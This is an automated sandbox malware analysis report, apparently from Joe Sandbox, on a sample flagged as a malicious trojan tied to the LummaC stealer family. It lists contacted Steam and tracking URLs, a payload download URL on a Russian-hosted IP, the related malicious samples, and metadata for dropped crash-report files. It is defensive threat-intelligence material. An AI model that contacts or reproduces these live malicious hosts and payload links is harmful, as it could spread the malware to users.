                                                                                                                                                                    http://127.0.0.1:2706026A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://store.steampowered.com/privacy_agreement/26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://post-to-me.com/track_prt.php?sub=g3toRYa6JE.exefalse
                                                                                                                                                                            high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.google.com/recaptcha/26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://checkout.steampowered.com/26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://help.steampowered.com/26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://api.steampowered.com/26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://post-to-me.com/g3toRYa6JE.exe, 00000000.00000002.3872617941.0000000000710000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://store.steampowered.com/account/cookiepreferences/26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://store.steampowered.com/mobile26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://post-to-me.com/track_prt.php?sub=0&cc=DEQg3toRYa6JE.exe, 00000000.00000002.3872617941.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://steamcommunity.com/26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://176.113.115.19/ScreenUpdateSync.exe$KUg3toRYa6JE.exe, 00000000.00000002.3872617941.00000000006D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://store.steampowered.com/;26A5.tmp.exe, 00000003.00000002.1789098662.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536225130.000000000066C000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://store.steampowered.com/about/26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://store.steampowered.com/points/shop~26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                        104.21.56.70
                                                                                                                                                                                                        post-to-me.comUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        104.102.49.254
                                                                                                                                                                                                        steamcommunity.comUnited States
                                                                                                                                                                                                        16625AKAMAI-ASUSfalse
                                                                                                                                                                                                        176.113.115.19
                                                                                                                                                                                                        unknownRussian Federation
                                                                                                                                                                                                        49505SELECTELRUfalse
                                                                                                                                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                        Analysis ID:1589514
                                                                                                                                                                                                        Start date and time:2025-01-12 17:44:18 +01:00
                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 8m 44s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                        Number of analysed new started processes analysed:12
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Sample name:g3toRYa6JE.exe
                                                                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                                                                        Original Sample Name:4e7e1578abc95ec22d6ed2c61bc5abf9.exe
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal100.troj.evad.winEXE@4/7@12/3
                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                        • Successful, ratio: 94%
                                                                                                                                                                                                        • Number of executed functions: 41
                                                                                                                                                                                                        • Number of non-executed functions: 340
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.190.159.0, 20.109.210.53
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                        11:45:26API Interceptor9189069x Sleep call for process: g3toRYa6JE.exe modified
                                                                                                                                                                                                        11:45:30API Interceptor2x Sleep call for process: 26A5.tmp.exe modified
                                                                                                                                                                                                        11:45:58API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        104.21.56.70b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                            • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                            http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                            176.113.115.19b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                            Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                            xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                            DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                            fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                            Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                            chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                            xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                            K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                            IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            steamcommunity.comUWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            TBI87y49f9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            H5JVfa61AV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            2EG0jAmtY6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            rii2.mp3.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            x.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            SDIO_R773.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            176.113.115.170_3.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            post-to-me.comb0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 172.67.179.207
                                                                                                                                                                                                                            Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            CLOUDFLARENETUStasAgNgjbJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 172.67.185.28
                                                                                                                                                                                                                            UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                            • 104.21.14.233
                                                                                                                                                                                                                            rii2.mp3.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.26.11.53
                                                                                                                                                                                                                            mNPTwHOuvT.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                            • 172.64.41.3
                                                                                                                                                                                                                            setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 172.67.162.17
                                                                                                                                                                                                                            gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                            • 104.26.13.205
                                                                                                                                                                                                                            Loader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 104.16.184.241
                                                                                                                                                                                                                            v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                            • 104.21.85.189
                                                                                                                                                                                                                            installer_1.05_37.4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.21.16.1
                                                                                                                                                                                                                            Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 104.21.34.147
                                                                                                                                                                                                                            SELECTELRU176.113.115.170.ps1Get hashmaliciousXWormBrowse
                                                                                                                                                                                                                            • 176.113.115.170
                                                                                                                                                                                                                            b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 176.113.115.19
                                                                                                                                                                                                                            Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 176.113.115.19
                                                                                                                                                                                                                            1In8uYbvZJ.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 176.113.115.177
                                                                                                                                                                                                                            xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 176.113.115.19
                                                                                                                                                                                                                            DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 176.113.115.19
                                                                                                                                                                                                                            fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 176.113.115.19
                                                                                                                                                                                                                            Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 176.113.115.19
                                                                                                                                                                                                                            chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 176.113.115.19
                                                                                                                                                                                                                            xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 176.113.115.19
                                                                                                                                                                                                                            AKAMAI-ASUSUWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            TBI87y49f9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            H5JVfa61AV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            2EG0jAmtY6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            rii2.mp3.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            mNPTwHOuvT.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                            • 23.49.251.20
                                                                                                                                                                                                                            res.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 184.85.6.161
                                                                                                                                                                                                                            176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            http://steam.usercommunityart.com/filedetails/sharedfiles/id=319248110/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 104.102.22.125
                                                                                                                                                                                                                            https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                            • 23.212.88.20
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            sE5IdDeTp2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            TBI87y49f9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            H5JVfa61AV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            2EG0jAmtY6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            5vrRrFN56j.exeGet hashmaliciousBdaejecBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            rii2.mp3.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            installer_1.05_37.4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                            37f463bf4616ecd445d4a1937da06e19UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            gem2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            1387457-38765948.15.exeGet hashmaliciousNitolBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            1387457-38765948.15.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            build.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            zmpZMfK1b4.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                            • 104.21.56.70
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                                            Entropy (8bit):0.9664007258078819
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:q6IgoF4Jp00kigMJuDjsFRzuiFmZ24IO8tNj:B2F4JpvkigXjIzuiFmY4IO8Hj
                                                                                                                                                                                                                            MD5:46B92E38F9CF793DBA60AA88FAB46E4B
                                                                                                                                                                                                                            SHA1:25E0B614C15DE6B47C42F31876D94FA934F1F634
                                                                                                                                                                                                                            SHA-256:B4AB377ADD330CDC6DE5618A4628C21B28AA3DCAB3F42AB8F9332D0A381FF345
                                                                                                                                                                                                                            SHA-512:3FC5D675DAF9699DA6179D6CCE4EEF96439D78D6A6468A76FAB5A624F9CC47B446A20CF7A8B32F68B23B042BC71731BC1338EF96A7E8C3D77589362CD3FB389E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.1.7.3.9.3.3.5.8.7.4.5.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.1.7.3.9.3.4.0.7.1.8.1.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.2.d.7.a.1.0.-.d.2.f.e.-.4.d.5.e.-.b.c.4.3.-.1.6.2.2.c.6.a.3.4.1.0.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.3.c.4.c.4.5.1.-.7.b.3.8.-.4.5.8.6.-.8.a.0.9.-.3.7.9.6.8.b.5.c.9.d.c.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.6.A.5...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.2.0.-.0.0.0.1.-.0.0.1.4.-.0.6.d.f.-.e.c.6.2.1.1.6.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.c.b.9.a.d.8.b.0.e.1.e.d.6.2.4.4.1.a.d.3.2.4.8.0.8.2.2.9.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.2.c.8.f.a.1.7.d.0.5.2.5.1.b.5.1.5.c.c.5.2.6.9.4.3.3.5.a.8.8.c.7.a.6.0.9.e.3.0.3.!.2.6.A.5...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5./.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Sun Jan 12 16:45:33 2025, 0x1205a4 type
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):44754
                                                                                                                                                                                                                            Entropy (8bit):2.492893952186059
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:DdP8XQCQWOp1BgpR3zUYbbS2VCyS/qZN6xYHK40lIfuTH:hMQh7Bgn3mtsy4K40+uL
                                                                                                                                                                                                                            MD5:46F33A664B37014AC2F4B70051CA23BB
                                                                                                                                                                                                                            SHA1:FCFAA0637DA4F166709178D77D04DE27879C1568
                                                                                                                                                                                                                            SHA-256:936276A25B17A2ADB1B13CAA3B5F0C51F138EB2C5A135E7EF0C38AB721CA7270
                                                                                                                                                                                                                            SHA-512:B4BA9392F102620C17AC1AEF98460A4F307E939033FEB48DB2CCF0F0F903E5A8F72C65830A5A0949B2590A3AE472FA3BD2920AEAC963B7223EC51AB13F005EC6
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:MDMP..a..... .........g............4...............H.......<...<.......d....+..........`.......8...........T............?...o..........x...........d...............................................................................eJ..............GenuineIntel............T....... .....g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):8392
